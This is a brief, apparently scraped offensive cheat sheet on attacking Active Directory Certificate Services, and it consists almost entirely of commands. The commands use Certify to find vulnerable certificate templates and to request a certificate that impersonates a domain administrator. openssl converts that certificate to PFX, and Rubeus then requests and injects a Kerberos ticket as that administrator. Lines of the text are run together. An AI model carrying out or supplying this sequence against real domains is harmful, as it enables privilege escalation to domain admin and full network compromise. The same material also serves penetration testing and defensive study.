ADCS Attacks
certify.exe findcertify.exe find /vulnerableCertify.exe request /ca:domain\ca-host /template:templateName /altname:domain\domainAdmin[*] cert.pem :
-----BEGIN RSA PRIVATE KEY-----
...
-----BEGIN CERTIFICATE-----openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfxRubeus.exe asktgt /user:domainAdmin /certificate:cert.pfx /nowrap# Purge existing tickets if necessary
klist purge
Rubeus.exe ptt /ticket:<ticket_b64>
# Ticket should now exist in your session
klistLast updated